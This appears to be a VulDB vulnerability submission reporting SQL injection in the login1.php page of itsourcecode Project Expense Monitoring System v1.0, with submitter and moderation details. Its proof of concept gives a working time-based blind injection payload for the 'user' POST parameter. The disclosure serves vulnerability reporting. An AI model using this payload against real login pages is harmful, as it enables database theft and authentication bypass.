| 제목 | itsourcecode Project Expense Monitoring System v1.0 SQLi |
|---|
| 설명 | On the login1.php login authentication page, attackers can construct SQL statements to obtain sensitive information from the database and use universal passwords to log in to the backend.
POC:
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=admin' AND (SELECT 5289 FROM (SELECT(SLEEP(5)))cTae) AND 'rmay'='rmay&pass=123 |
|---|
| 원천 | ⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE3-1.md |
|---|
| 사용자 | GUOTINGTING (UID 73614) |
|---|
| 제출 | 2024. 08. 17. PM 02:13 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 08. 19. PM 04:12 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 275118 [itsourcecode Project Expense Monitoring System 1.0 Backend Login login1.php 사용자 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|